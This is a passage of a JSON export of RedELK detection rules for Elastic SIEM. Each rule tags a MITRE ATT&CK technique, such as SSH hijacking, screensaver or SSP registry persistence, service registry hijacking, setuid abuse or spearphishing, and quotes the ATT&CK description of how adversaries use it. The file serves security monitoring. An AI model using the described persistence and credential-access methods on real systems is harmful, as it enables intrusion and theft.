3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1053] Scheduled Task","query":"threat.technique.id: T1053","references":["https://attack.mitre.org/techniques/T1053"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1053","name":"Scheduled Task","id":"T1053"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0002","name":"Execution","id":"TA0002"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1053","name":"Scheduled Task","id":"T1053"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1053","name":"Scheduled Task","id":"T1053"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0004","name":"Privilege Escalation","id":"TA0004"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may hijack a legitimate user's SSH session to move laterally within an environment. Secure Shell (SSH) is a standard means of remote access on Linux and macOS systems. It allows a user to connect to another system via an encrypted tunnel, commonly authenticating through a password, certificate or the use of an asymmetric encryption key pair.\nIn order to move laterally from a compromised host, adversaries may take advantage of trust relationships established with other systems via public key authentication in active SSH sessions by hijacking an existing connection to another system. This may occur through compromising the SSH agent itself or by having access to the agent's socket. If an adversary is able to obtain root access, then hijacking SSH sessions is likely trivial.[1][2][3][4]\nSSH Hijacking differs from use of SSH because it hijacks an existing SSH session rather than creating a new session using Valid Accounts.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1184","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1184] SSH Hijacking","query":"threat.technique.id: T1184","references":["https://attack.mitre.org/techniques/T1184","https://attack.mitre.org/techniques/T1563/001"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1184","name":"SSH Hijacking","id":"T1184"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0008","name":"Lateral Movement","id":"TA0008"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may schedule data exfiltration to be performed only at certain times of day or at certain intervals. This could be done to blend traffic patterns with normal activity or availability.\nWhen scheduled exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the network, such as Exfiltration Over C2 Channel or Exfiltration Over Alternative Protocol.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1029","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1029] Scheduled Transfer","query":"threat.technique.id: T1029","references":["https://attack.mitre.org/techniques/T1029"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1029","name":"Scheduled Transfer","id":"T1029"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0010","name":"Exfiltration","id":"TA0010"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as CopyFromScreen, xwd, or screencapture.[1][2]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1113","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1113] Screen Capture","query":"threat.technique.id: T1113","references":["https://attack.mitre.org/techniques/T1113"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1113","name":"Screen Capture","id":"T1113"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0009","name":"Collection","id":"TA0009"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Scripting","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1064","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1064] Scripting","query":"threat.technique.id: T1064","references":["https://attack.mitre.org/techniques/T1064","https://attack.mitre.org/techniques/T1059"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1064","name":"Scripting","id":"T1064"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1064","name":"Scripting","id":"T1064"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0002","name":"Execution","id":"TA0002"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may establish persistence by executing malicious content triggered by user inactivity. Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension.[1] The Windows screensaver application scrnsave.scr is located in C:\\Windows\\System32\\, and C:\\Windows\\sysWOW64\\ on 64-bit Windows systems, along with screensavers included with base Windows installations.\nThe following screensaver settings are stored in the Registry (HKCU\\Control Panel\\Desktop\\) and could be manipulated to achieve persistence:\nSCRNSAVE.exe - set to malicious PE path\nScreenSaveActive - set to '1' to enable the screensaver\nScreenSaverIsSecure - set to '0' to not require a password to unlock\nScreenSaveTimeout - sets user inactivity timeout before screensaver is executed\nAdversaries can use screensaver settings to maintain persistence by setting the screensaver to run malware after a certain timeframe of user inactivity. [2]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1180","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1180] Screensaver","query":"threat.technique.id: T1180","references":["https://attack.mitre.org/techniques/T1180","https://attack.mitre.org/techniques/T1546/002"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1180","name":"Screensaver","id":"T1180"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\nExample commands that can be used to obtain security software information are netsh, reg query with Reg, dir with cmd, and Tasklist, but other indicators of discovery behavior may be more specific to the type of software or security system the adversary is looking for. It is becoming more common to see macOS malware perform checks for LittleSnitch and KnockKnock software.\nAdversaries may also utilize cloud APIs to discover the configurations of firewall rules within an environment.[1]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1063","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1063] Security Software Discovery","query":"threat.technique.id: T1063","references":["https://attack.mitre.org/techniques/T1063","https://attack.mitre.org/techniques/T1518/001"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1063","name":"Security Software Discovery","id":"T1063"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0007","name":"Discovery","id":"TA0007"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may abuse security support providers (SSPs) to execute DLLs when the system boots. Windows SSP DLLs are loaded into the Local Security Authority (LSA) process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs.\nThe SSP configuration is stored in two Registry keys: HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\Security Packages and HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\OSConfig\\Security Packages. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called.[1]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1101","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1101] Security Support Provider","query":"threat.technique.id: T1101","references":["https://attack.mitre.org/techniques/T1101","https://attack.mitre.org/techniques/T1547/005"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1101","name":"Security Support Provider","id":"T1101"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"An adversary may obtain root access (allowing them to read securityd’s memory), then they can scan through memory to find the correct sequence of keys in relatively few tries to decrypt the user’s logon keychain. This provides the adversary with all the plaintext passwords for users, WiFi, mail, browsers, certificates, secure notes, etc.[1] [2]\nIn OS X prior to El Capitan, users with root access can read plaintext keychain passwords of logged-in users because Apple’s keychain implementation allows these credentials to be cached so that users are not repeatedly prompted for passwords. [1] [3] Apple’s securityd utility takes the user’s logon password, encrypts it with PBKDF2, and stores this master key in memory. Apple also uses a set of keys and algorithms to encrypt the user’s password, but once the master key is found, an attacker need only iterate over the other values to unlock the final password.[1]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1167","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1167] Securityd Memory","query":"threat.technique.id: T1167","references":["https://attack.mitre.org/techniques/T1167","https://attack.mitre.org/techniques/T1555/002"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1167","name":"Securityd Memory","id":"T1167"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0006","name":"Credential Access","id":"TA0006"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may abuse legitimate extensible development features of servers to establish persistent access to systems. Enterprise server applications may include features that allow developers to write and install software or scripts to extend the functionality of the main application. Adversaries may install malicious components to extend and abuse server applications.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1505","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1505] Server Software Component","query":"threat.technique.id: T1505","references":["https://attack.mitre.org/techniques/T1505"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1505","name":"Server Software Component","id":"T1505"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager (services.exe) is an interface to manage and manipulate services.[1] The service control manager is accessible to users via GUI components as well as system utilities such as sc.exe and Net.\nPsExec can also be used to execute commands or payloads via a temporary Windows service created through the service control manager API.[2]\nAdversaries may leverage these mechanisms to execute malicious content. This can be done by either executing a new or modified service. This technique is the execution used in conjunction with Windows Service during service persistence or privilege escalation.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1035","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1035] Service Execution","query":"threat.technique.id: T1035","references":["https://attack.mitre.org/techniques/T1035","https://attack.mitre.org/techniques/T1569/002"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1035","name":"Service Execution","id":"T1035"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0002","name":"Execution","id":"TA0002"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may stop or disable services on a system to render those services unavailable to legitimate users. Stopping critical services can inhibit or stop response to an incident or aid in the adversary's overall objectives to cause damage to the environment.[1][2]\nAdversaries may accomplish this by disabling individual services of high importance to an organization, such as MSExchangeIS, which will make Exchange content inaccessible [2]. In some cases, adversaries may stop or disable many or all services to render systems unusable.[1] Services may not allow for modification of their data stores while running. Adversaries may stop services in order to conduct Data Destruction or Data Encrypted for Impact on the data stores of services like Exchange and SQL Server.[3]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1489","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1489] Service Stop","query":"threat.technique.id: T1489","references":["https://attack.mitre.org/techniques/T1489"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1489","name":"Service Stop","id":"T1489"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0040","name":"Impact","id":"TA0040"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for registry to redirect from the originally specified executable to one that they control, in order to launch their own code at Service start. Windows stores local service configuration information in the Registry under HKLM\\SYSTEM\\CurrentControlSet\\Services. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe, PowerShell, or Reg. Access to Registry keys is controlled through Access Control Lists and permissions. [1]\nIf the permissions for users and groups are not properly set and allow access to the Registry keys for a service, then adversaries can change the service binPath/ImagePath to point to a different executable under their control. When the service starts or is restarted, then the adversary-controlled program will execute, allowing the adversary to gain persistence and/or privilege escalation to the account context the service is set to execute under (local/domain account, SYSTEM, LocalService, or NetworkService).\nAdversaries may also alter Registry keys associated with service failure parameters (such as FailureCommand) that may be executed in an elevated context anytime the service fails or is intentionally corrupted.[2][3]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1058","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1058] Service Registry Permissions Weakness","query":"threat.technique.id: T1058","references":["https://attack.mitre.org/techniques/T1058","https://attack.mitre.org/techniques/T1574/011"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1058","name":"Service Registry Permissions Weakness","id":"T1058"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1058","name":"Service Registry Permissions Weakness","id":"T1058"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0004","name":"Privilege Escalation","id":"TA0004"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"An adversary may perform shell escapes or exploit vulnerabilities in an application with the setsuid or setgid bits to get code running in a different user’s context. On Linux or macOS, when the setuid or setgid bits are set for an application, the application will run with the privileges of the owning user or group respectively. [1]. Normally an application is run in the current user’s context, regardless of which user or group owns the application. However, there are instances where programs need to be executed in an elevated context to function properly, but the user running them doesn’t need the elevated privileges.\nInstead of creating an entry in the sudoers file, which must be done by root, any user can specify the setuid or setgid flag to be set for their own applications. These bits are indicated with an \"s\" instead of an \"x\" when viewing a file's attributes via ls -l. The chmod program can set these bits with via bitmasking, chmod 4777 [file] or via shorthand naming, chmod u+s [file].\nAdversaries can use this mechanism on their own malware to make sure they're able to execute in elevated contexts in the future.[2].","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1166","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1166] Setuid and Setgid","query":"threat.technique.id: T1166","references":["https://attack.mitre.org/techniques/T1166","https://attack.mitre.org/techniques/T1548/001"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1166","name":"Setuid and Setgid","id":"T1166"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0004","name":"Privilege Escalation","id":"TA0004"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1166","name":"Setuid and Setgid","id":"T1166"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Shared Webroot","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1051","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1051] Shared Webroot","query":"threat.technique.id: T1051","references":["https://attack.mitre.org/techniques/T1051"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1051","name":"Shared Webroot","id":"T1051"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0008","name":"Lateral Movement","id":"TA0008"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may create or edit shortcuts to run a program during system boot or user login. Shortcuts or symbolic links are ways of referencing other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process.\nAdversaries could use shortcuts to execute their tools for persistence. They may create a new shortcut as a means of indirection that may use Masquerading to look like a legitimate program. Adversaries could also edit the target path or entirely replace an existing shortcut so their tools will be executed instead of the intended legitimate program.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1023","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1023] Shortcut Modification","query":"threat.technique.id: T1023","references":["https://attack.mitre.org/techniques/T1023","https://attack.mitre.org/techniques/T1547/009"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1023","name":"Shortcut Modification","id":"T1023"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0003","name":"Persistence","id":"TA0003"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may bypass process and/or signature-based defenses by proxying execution of malicious content with signed binaries. Binaries signed with trusted digital certificates can execute on Windows systems protected by digital signature validation. Several Microsoft signed binaries that are default on Windows installations can be used to proxy execution of other files.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1218","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1218] Signed Binary Proxy Execution","query":"threat.technique.id: T1218","references":["https://attack.mitre.org/techniques/T1218"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1218","name":"Signed Binary Proxy Execution","id":"T1218"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1218","name":"Signed Binary Proxy Execution","id":"T1218"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0002","name":"Execution","id":"TA0002"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may use scripts signed with trusted certificates to proxy execution of malicious files. Several Microsoft signed scripts that are default on Windows installations can be used to proxy execution of other files. This behavior may be abused by adversaries to execute malicious files that could bypass application control and signature validation on systems.[1]","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1216","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1216] Signed Script Proxy Execution","query":"threat.technique.id: T1216","references":["https://attack.mitre.org/techniques/T1216"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1216","name":"Signed Script Proxy Execution","id":"T1216"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1216","name":"Signed Script Proxy Execution","id":"T1216"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0002","name":"Execution","id":"TA0002"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may attempt to get a listing of software and software versions that are installed on a system or in a cloud environment. Adversaries may use the information from Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\nAdversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable to Exploitation for Privilege Escalation.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1518","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1518] Software Discovery","query":"threat.technique.id: T1518","references":["https://attack.mitre.org/techniques/T1518"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1518","name":"Software Discovery","id":"T1518"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0007","name":"Discovery","id":"TA0007"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Source","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1153","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1153] Source","query":"threat.technique.id: T1153","references":["https://attack.mitre.org/techniques/T1153"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1153","name":"Source","id":"T1153"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0002","name":"Execution","id":"TA0002"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.[1]\nUtilities used to perform software packing are called packers. Example packers are MPRESS and UPX. A more comprehensive list of known packers is available, [2] but adversaries may create their own packing techniques that do not leave the same artifacts as well-known packers to evade defenses.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1045","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1045] Software Packing","query":"threat.technique.id: T1045","references":["https://attack.mitre.org/techniques/T1045","https://attack.mitre.org/techniques/T1027/002"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1045","name":"Software Packing","id":"T1045"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries can hide a program's true filetype by changing the extension of a file. With certain file types (specifically this does not work with .app extensions), appending a space to the end of a filename will change how the file is processed by the operating system.\nFor example, if there is a Mach-O executable file called evil.bin, when it is double clicked by a user, it will launch Terminal.app and execute. If this file is renamed to evil.txt, then when double clicked by a user, it will launch with the default text editing application (not executing the binary). However, if the file is renamed to evil.txt (note the space at the end), then when double clicked by a user, the true file type is determined by the OS and handled appropriately and the binary will be executed [1].\nAdversaries can use this feature to trick users into double clicking benign-looking files of any format and ultimately executing something malicious.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1151","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1151] Space after Filename","query":"threat.technique.id: T1151","references":["https://attack.mitre.org/techniques/T1151","https://attack.mitre.org/techniques/T1036/006"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1151","name":"Space after Filename","id":"T1151"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0005","name":"Defense Evasion","id":"TA0005"}},{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1151","name":"Space after Filename","id":"T1151"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0002","name":"Execution","id":"TA0002"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may send spearphishing emails with a malicious attachment in an attempt to elicit sensitive information and/or gain access to victim systems. Spearphishing attachment is a specific variant of spearphishing. Spearphishing attachment is different from other forms of spearphishing in that it employs the use of malware attached to an email. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon User Execution to gain execution.\nThere are many options for the attachment such as Microsoft Office documents, executables, PDFs, or archived files. Upon opening the attachment (and potentially clicking past protections), the adversary's payload exploits a vulnerability or directly executes on the user's system. The text of the spearphishing email usually tries to give a plausible reason why the file should be opened, and may explain how to bypass system protections in order to do so. The email may also contain instructions on how to decrypt an attachment, such as a zip file password, in order to evade email boundary defenses. Adversaries frequently manipulate file extensions and icons in order to make attached executables appear to be document files, or files exploiting one application appear to be a file for a different one.","enabled":true,"false_positives":[],"from":"now-360s","immutable":false,"index":["rtops-*"],"interval":"5m","rule_id":"redelk-rule-T1193","language":"kuery","license":"BSD 3-clause","output_index":".siem-signals-default","max_signals":100,"risk_score":50,"risk_score_mapping":[],"name":"[T1193] Spearphishing Attachment","query":"threat.technique.id: T1193","references":["https://attack.mitre.org/techniques/T1193","https://attack.mitre.org/techniques/T1566/001"],"severity":"low","severity_mapping":[],"tags":["RedELK"],"to":"now","type":"query","threat":[{"framework":"MITRE ATT&CK","technique":[{"reference":"https://attack.mitre.org/techniques/T1193","name":"Spearphishing Attachment","id":"T1193"}],"tactic":{"reference":"https://attack.mitre.org/tactics/TA0001","name":"Initial Access","id":"TA0001"}}],"throttle":"no_actions","note":"","version":1,"exceptions_list":[]} +{"author":["Lorenzo Bernardi"],"actions":[],"description":"Adversaries may send spearphishing emails with a malicious link in an attempt to elicit sensitive information and/or gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email 